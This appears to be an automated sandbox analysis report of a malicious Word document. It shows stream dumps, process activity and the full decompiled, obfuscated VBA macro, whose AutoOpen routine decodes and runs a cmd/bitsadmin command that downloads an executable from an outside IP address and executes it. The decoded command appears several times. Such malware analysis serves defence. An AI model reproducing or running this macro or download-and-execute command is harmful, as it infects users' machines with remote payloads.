Data ASCII: | . a y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . |
Data Raw: | cc 61 79 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00 |
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 588 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/dir |
File Type: | data |
Stream Size: | 588 |
Entropy: | 6.2869378548 |
Base64 Encoded: | True |
Data ASCII: | . H . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . s d g . . e r g h . e g e . . L . . @ . . . . . . = . . . . ~ . . . . . . . . . . . . Y ( . . . . J < . . . . . . 9 s t d o l e > . . . s . t . d . o . . l . e . . . h . . % ^ . . * \\ G { 0 . 0 0 2 0 4 3 0 - ; . . . . C . . . . . . 0 0 . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ S y s @ W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t 8 i o n . 0 . . . E N o P r m a l . E N . C r . . m . a . F . . . . . . . . * \\ C . . . . |
Data Raw: | 01 48 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 10 00 1c 08 73 64 67 03 08 65 72 67 68 10 65 67 65 05 00 4c 00 00 40 d5 02 0a 06 02 0a 3d 02 0a 07 02 7e 01 14 0a 08 06 12 09 02 12 c5 17 ac 59 28 10 00 0c 02 4a 3c 02 0a 16 00 01 01 39 73 74 64 6f 6c 65 3e 01 02 19 73 00 74 00 64 00 6f 00 00 6c 00 65 00 0d 00 68 05 00 25 5e 00 03 2a |
Stream Path: WordDocument, File Type: data, Stream Size: 8248 |
---|
General | |
---|---|
Stream Path: | WordDocument |
File Type: | data |
Stream Size: | 8248 |
Entropy: | 3.72353646171 |
Base64 Encoded: | True |
Data ASCII: | . . . . # ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j m . m . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . ^ . . . ^ . . . . . . . ^ . . . . . . . ^ . . . . . . . ^ . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . |
Data Raw: | ec a5 c1 00 23 60 19 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 06 00 00 b0 0b 00 00 0e 00 62 6a 62 6a 6d a5 6d a5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 38 20 00 00 0f cf 00 00 0f cf 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 |
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 17:34:20 |
Start date: | 12/01/2017 |
Path: | C:\Program Files\Microsoft Office 15\root\office15\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | unknown |
Imagebase: | 0xcb0000 |
File size: | 1923232 bytes |
MD5 hash: | FEC5FFC0B51C78D9376A74CD2855D479 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 17:34:25 |
Start date: | 12/01/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit |
Imagebase: | 0x771a0000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 17:34:26 |
Start date: | 12/01/2017 |
Path: | C:\Windows\System32\bitsadmin.exe |
Wow64 process (32bit): | false |
Commandline: | bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe C:\Users\SOFWIL~1\AppData\Local\Temp\~.exe |
Imagebase: | 0x755a0000 |
File size: | 186368 bytes |
MD5 hash: | 0920B14AA67A8B04ACF48FFE7C6F0927 |
Programmed in: | C, C++ or other language |
General |
---|
Start time: | 17:36:26 |
Start date: | 12/01/2017 |
Path: | C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE |
Wow64 process (32bit): | false |
Commandline: | C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\MSOSQM.EXE |
Imagebase: | 0x1240000 |
File size: | 550576 bytes |
MD5 hash: | 04D5CDDFC37410CF388AD731E655E277 |
Programmed in: | C, C++ or other language |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: NewMacros |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "NewMacros" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Array | |
Array | |
Array | |
Array | |
Array | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Replace | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: CreateObject | |
Part of subcall function MJCTM@NewMacros: Date | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Pattern | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Date | |
Part of subcall function MJCTM@NewMacros: Array | |
Part of subcall function MJCTM@NewMacros: Global | |
Part of subcall function MJCTM@NewMacros: Replace | |
Array | |
Date | |
Shell | Shell("cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit",0) -> 1964 |
Array | |
Array |
Strings | Decrypted Strings |
---|---|
"08fd" | |
"T" | |
"debasement" | |
"So4T9" | |
"cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9" | |
"ring" | |
"317eed7b" | |
"32500" | |
"""" |
Line | Instruction | Meta Information |
---|---|---|
89 | Sub AutoOpen() | |
90 | Dim GUEQgl0 as Currency | executed |
91 | GUEQgl0 = - 4067 | |
92 | Dim wcUbOm | |
93 | wcUbOm = Array() | Array |
94 | Dim gq5z4s | |
95 | gq5z4s = Array(44415.093361908, - 12425, True, "T", "08fd", True) | Array |
96 | oUJ1RH = 12730.522629119 | |
97 | Dim SYLDEIEHU as Long | |
98 | SYLDEIEHU = - 1851000800 | |
99 | Dim FtubqlSwF | |
100 | FtubqlSwF = 194 | |
101 | Const nfYJAbOe = True | |
102 | dXqA7m = Array(- 12581, "debasement", 5843.503110416, 51380, 28, 17137.457762019) | Array |
103 | Dim nUKaI61f as String | |
104 | Const EbPbjMfg = False | |
105 | Dim ETBwFjm | |
106 | ETBwFjm = Array() | Array |
107 | qHfrpSwZq = - 219635906 | |
108 | Dim uj0Cswp | |
109 | uj0Cswp = 9 | |
110 | Dim kyyXvysya as Variant | |
111 | kyyXvysya = Array() | Array |
112 | nUKaI61f = MJCTM("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9", "So4T9") | |
113 | AJnLTjdoe = Array(50590, 0, 253, 11638, "ring", False, - 2378) | Array |
114 | Dim jQsbW | |
115 | jQsbW = Date | Date |
116 | Dim J8pAjy as String | |
117 | J8pAjy = "317eed7b" | |
118 | zHgWO = - 2086329278 | |
119 | kpmVq = Empty | |
120 | BqXpmPanR = True | |
121 | hRpGYfaRr = - 426398108 | |
122 | Const IbHFT = "32500" | |
123 | G3h5PwT = - 13855 | |
124 | Shell nUKaI61f, 0 | Shell("cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit",0) -> 1964 executed |
125 | Hwpuwedp = Array(0, 20128, 54868.962024103, 45712.308802002, True, - 1868748710, "") | Array |
126 | ORSXIMyL = - 16892 | |
127 | Dim SGqXR | |
128 | SGqXR = 16032.845284238 | |
129 | Const OFXiY = 34986.350534212 | |
130 | Dim xQWF3VrvY as Variant | |
131 | xQWF3VrvY = Array() | Array |
132 | dVrztZa = 0 | |
133 | JBwM8 = 14580.854766339 | |
134 | End Sub |
APIs | Meta Information |
---|---|
Array | |
Replace | Replace("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9","So4T9","") -> cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit |
Array | |
Array | |
Array | |
CreateObject | CreateObject("vbscript.regexp") |
Date | |
Array | |
Array | |
Array | |
Pattern | |
Array | |
Array | |
Date | |
Array | |
Global | |
Replace | IRegExp2.Replace("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9","") -> cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit |
Strings | Decrypted Strings |
---|---|
"usher" | |
"l" | |
"""" | |
"m" | |
"vbscript.regexp" | |
"b1bc" | |
"g" | |
"""" | |
"-51274" | |
"-31815" | |
"""" |
Line | Instruction | Meta Information |
---|---|---|
2 | Function MJCTM(CWDMxZLy as String, FbIlx as String) | |
3 | Const MiPNInTB = "usher" | executed |
4 | Const VoTwTzi = 56413.774156729 | |
5 | ijrJGJ = 27499.72631798 | |
6 | Dim SMBLRBfVb | |
7 | SMBLRBfVb = Empty | |
8 | Dim UaeOs | |
9 | UaeOs = Array() | Array |
10 | Dim u6TmeUD | |
11 | u6TmeUD = 104 | |
12 | ur6AH = Null | |
13 | cxnTF = "l" | |
14 | MJCTM = Replace(CWDMxZLy, FbIlx, "") | Replace("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9","So4T9","") -> cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit executed |
15 | Dim pLTyDvz | |
16 | pLTyDvz = Empty | |
17 | pcIlatmCk = Array(230, - 196, - 2001184018, 42, True) | Array |
18 | BnrkBExe = Array(10023, True, 53568, 247) | Array |
19 | Dim WDYsMRc | |
20 | WDYsMRc = 30721.11938915 | |
21 | Dim YzdUxwdTr as Integer | |
22 | YzdUxwdTr = 6299 | |
23 | Dim lByiA | |
24 | lByiA = Array() | Array |
25 | Const zLddbe = "m" | |
26 | Dim rIBoSu3Y | |
27 | rIBoSu3Y = Null | |
28 | Set SHswlL = CreateObject("vbscript.regexp") | CreateObject("vbscript.regexp") executed |
29 | QSdqj = Date | Date |
30 | Const NFLd2 = 209 | |
31 | Dim twrPREK as Variant | |
32 | twrPREK = Array() | Array |
33 | Dim u5gdI as Variant | |
34 | u5gdI = Array(False, "b1bc", 253, 17635, - 1034035452) | Array |
35 | Const AiUVN = 130 | |
36 | Dim xrO5u as Boolean | |
37 | xrO5u = False | |
38 | Dim DtSd2 as Currency | |
39 | DtSd2 = 24643 | |
40 | TxB7XFd = Array() | Array |
41 | SHswlL.Pattern = FbIlx | Pattern |
42 | Dim KWqu4PuM | |
43 | KWqu4PuM = Array(18941) | Array |
44 | Const PoTWMJbw = 4611 | |
45 | Const zvcqMHRt = 45690 | |
46 | Dim dBM7m | |
47 | dBM7m = Array() | Array |
48 | Dim Jhkf0ces | |
49 | Jhkf0ces = 18334 | |
50 | Px3LN = Empty | |
51 | Dim CP3XeR as Long | |
52 | Dim QLnSIFu | |
53 | QLnSIFu = "g" | |
54 | Dim FjRfK | |
55 | FjRfK = 37054 | |
56 | Dim lttYOFV as Byte | |
57 | lttYOFV = 103 | |
58 | Dim hwbE4nQC | |
59 | hwbE4nQC = 238 | |
60 | Dim HxZaHEuKH | |
61 | HxZaHEuKH = "" | |
62 | ZIGd3quHC = Date | Date |
63 | efuU1j3i = 19822 | |
64 | CP3XeR = True | |
65 | IsvteRd = True | |
66 | Dim xrm3j | |
67 | xrm3j = 0 | |
68 | Const wwBlWqvE = 32055 | |
69 | Dim YrDaO as Integer | |
70 | YrDaO = - 20549 | |
71 | Dim TQAPu | |
72 | TQAPu = Empty | |
73 | XFRbqp6x = False | |
74 | QvKu9pdc = Array(0, - 324123460, True, "-51274", 201, 77, 0) | Array |
75 | Const ZLaDNPOM0 = 0 | |
76 | SHswlL.Global = CP3XeR | Global |
77 | Dim BShA9 as Long | |
78 | BShA9 = - 652703950 | |
79 | Dim VLlsY | |
80 | VLlsY = 173 | |
81 | Dim JrF8V | |
82 | JrF8V = Null | |
83 | Const YCxJyqzq = - 23691 | |
84 | PlVOxYFG = "-31815" | |
85 | Const QjPYL = 224 | |
86 | MJCTM = SHswlL.Replace(CWDMxZLy, "") | IRegExp2.Replace("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9","") -> cmd /C bitsadmin /transfer dw /download /priority high http://93.170.104.98/jbmfkjfre.exe %tmp%\~.exe & %tmp%\~.exe & exit executed |
87 | End Function |
Module: ThisDocument |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "1Normal.ThisDocument" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = True |
8 | Attribute VB_Customizable = True |